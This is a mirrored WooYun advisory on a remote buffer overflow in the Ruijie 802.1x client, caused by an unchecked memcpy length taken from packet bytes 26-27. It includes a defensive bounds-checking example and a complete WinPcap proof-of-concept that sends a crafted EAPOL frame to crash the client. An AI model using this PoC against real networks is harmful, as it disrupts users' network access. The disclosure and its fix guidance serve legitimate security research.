WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------------- http://drop.zone.ci/
2013-03-11: Actively contacting the vendor and waiting for the vendor to confirm the report; details not disclosed publicly.
2013-06-09: The vendor has actively ignored the vulnerability; details disclosed to the public.
The Ruijie 802.1x client has a remote buffer overflow vulnerability: when a malicious packet is sent to the client, it causes a remote buffer overflow that leads to a denial of service.
Looking at the IDA disassembly, in function sub_465920 the length passed to memcpy is attacker-controllable: it is taken from bytes 26 and 27 of the packet the program receives, and the program does not validate it against the size of the destination buffer or of the received data. The resulting buffer overflow causes a denial of service.
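As an added defensive illustration (this is example code written for this page; it is not the report's PoC and not Ruijie's code), the following shows the check the client is missing: the 16-bit length at bytes 26 and 27 is read, then bounded by both the number of bytes actually received and the size of the destination buffer before memcpy runs. The offsets come from the report; the byte order of the field, the payload starting at offset 28, and the 256-byte destination buffer are assumptions made for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Offsets from the report: the copy length is taken from bytes 26 and 27.
 * The report does not state byte order; big-endian is assumed here. */
#define LEN_FIELD_OFFSET 26u
#define PAYLOAD_OFFSET   28u   /* assumed: payload follows the length field */
#define DST_BUF_SIZE     256u  /* assumed size of the client's receive buffer */

enum parse_result {
    PARSE_OK                = 0,
    PARSE_TOO_SHORT         = -1,  /* frame does not even contain the length field */
    PARSE_LEN_EXCEEDS_FRAME = -2,  /* length claims more bytes than were received */
    PARSE_LEN_EXCEEDS_DST   = -3   /* length is larger than the destination buffer */
};

/* Read the 16-bit length field at bytes 26-27 (big-endian assumed). */
static uint16_t read_len_field(const uint8_t *pkt)
{
    return (uint16_t)(((uint16_t)pkt[LEN_FIELD_OFFSET] << 8) | pkt[LEN_FIELD_OFFSET + 1]);
}

/* Hardened copy: every bound is verified before memcpy is allowed to run.
 * pkt_len is the number of bytes actually received, dst_size the real
 * capacity of dst. On success *copied receives the number of bytes copied. */
int copy_payload_checked(const uint8_t *pkt, size_t pkt_len,
                         uint8_t *dst, size_t dst_size, size_t *copied)
{
    if (pkt_len < PAYLOAD_OFFSET)
        return PARSE_TOO_SHORT;

    size_t len = read_len_field(pkt);
    if (len > pkt_len - PAYLOAD_OFFSET)      /* cannot read past the received data */
        return PARSE_LEN_EXCEEDS_FRAME;
    if (len > dst_size)                      /* cannot write past the destination */
        return PARSE_LEN_EXCEEDS_DST;

    memcpy(dst, pkt + PAYLOAD_OFFSET, len);
    if (copied)
        *copied = len;
    return PARSE_OK;
}

/* Constructed frame with the same length bytes the report's PoC uses (0xEE 0xFF)
 * inside a 100-byte frame: the hardened check rejects it. */
int check_poc_style_frame(void)
{
    uint8_t frame[100] = {0};
    frame[12] = 0x88; frame[13] = 0x8e;   /* EAPOL ethertype */
    frame[26] = 0xEE; frame[27] = 0xFF;   /* length field far beyond the frame */
    uint8_t dst[DST_BUF_SIZE];
    return copy_payload_checked(frame, sizeof frame, dst, sizeof dst, NULL);
}

/* Constructed well-formed frame: 32 bytes of payload, fits both limits. */
int check_well_formed_frame(void)
{
    uint8_t frame[100] = {0};
    frame[12] = 0x88; frame[13] = 0x8e;
    frame[26] = 0x00; frame[27] = 0x20;
    uint8_t dst[DST_BUF_SIZE];
    size_t n = 0;
    int rc = copy_payload_checked(frame, sizeof frame, dst, sizeof dst, &n);
    return (rc == PARSE_OK && n == 32) ? 0 : -1;
}

/* Constructed frame that is large enough to hold its claimed payload (1024 bytes)
 * but whose payload would overflow the 256-byte destination. */
int check_oversized_for_dst(void)
{
    uint8_t frame[1500] = {0};
    frame[12] = 0x88; frame[13] = 0x8e;
    frame[26] = 0x04; frame[27] = 0x00;
    uint8_t dst[DST_BUF_SIZE];
    return copy_payload_checked(frame, sizeof frame, dst, sizeof dst, NULL);
}

/* Constructed truncated frame: shorter than the header that carries the length. */
int check_truncated_frame(void)
{
    uint8_t frame[20] = {0};
    uint8_t dst[DST_BUF_SIZE];
    return copy_payload_checked(frame, sizeof frame, dst, sizeof dst, NULL);
}
```

The two limits are deliberately separate: checking only against the destination buffer would still let a short frame be over-read, and checking only against the received length would still let a large frame overflow the destination. A fix in the client needs both, and each rejection reason is returned distinctly so that it can be logged as a malformed-frame event.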
PoC code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tchar.h>
#include <windows.h>   /* Sleep() */
#include <pcap.h>
#pragma comment( lib , "wpcap.lib" )

int _tmain(int argc, _TCHAR* argv[])
{
    pcap_t *fp;
    char errbuf[PCAP_ERRBUF_SIZE];
    u_char packet[3000];
    pcap_if_t *alldevs;
    pcap_if_t *d;
    int i = 0;

    /* Enumerate the local adapters */
    if (pcap_findalldevs(&alldevs, errbuf) == -1)
    {
        fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);
    }

    /* Print the list */
    for (d = alldevs; d; d = d->next)
    {
        printf("%d. %s", ++i, d->name);
        if (d->description)
            printf(" (%s)\n", d->description);
        else
            printf(" (No description available)\n");
    }

    /* Open the chosen adapter (the first one in the list is used here) */
    if ((fp = pcap_open_live(alldevs->name, // name of the device
                             65536,         // portion of the packet to capture; does not matter in this case
                             1,             // promiscuous mode (nonzero means promiscuous)
                             1000,          // read timeout
                             errbuf         // error buffer
                             )) == NULL)
    {
        fprintf(stderr, "\nUnable to open the adapter. %s is not supported by WinPcap\n", alldevs->name);
        pcap_freealldevs(alldevs);
        return 2;
    }
    pcap_freealldevs(alldevs);

    memset(packet, 0, sizeof(packet));

    /* MAC address of the target machine */
    packet[0] = 0x00;
    packet[1] = 0x0C;
    packet[2] = 0x29;
    packet[3] = 0x0F;
    packet[4] = 0x63;
    packet[5] = 0xDD;

    /* Set MAC source to 2:2:2:2:2:2 */
    packet[6]  = 2;
    packet[7]  = 2;
    packet[8]  = 2;
    packet[9]  = 2;
    packet[10] = 2;
    packet[11] = 2;

    /* Protocol header */
    packet[12] = 0x88;
    packet[13] = 0x8e;
    packet[14] = 0x01;
    packet[15] = 0x00;
    packet[16] = 0xFF; // > 4
    packet[17] = 0xFF; // > 4
    packet[18] = 0x03;
    packet[22] = 0x00;
    packet[23] = 0x00;
    packet[24] = 0x13;
    packet[25] = 0x11;
    packet[26] = 0xEE;
    packet[27] = 0xFF;

    /* Send the packet twice, 100 ms apart */
    for (i = 0; i < 2; i++)
    {
        if (pcap_sendpacket(fp,     // adapter
                            packet, // buffer with the packet
                            100     // size
                            ) != 0)
        {
            fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp));
            pcap_close(fp);
            return 3;
        }
        Sleep(100);
    }

    pcap_close(fp);
    return 0;
}
Run the client program.
Enter the username and password and click Connect.
Run the PoC code.
The client program overflows and exits.
Unable to reach the vendor, or the vendor actively refused.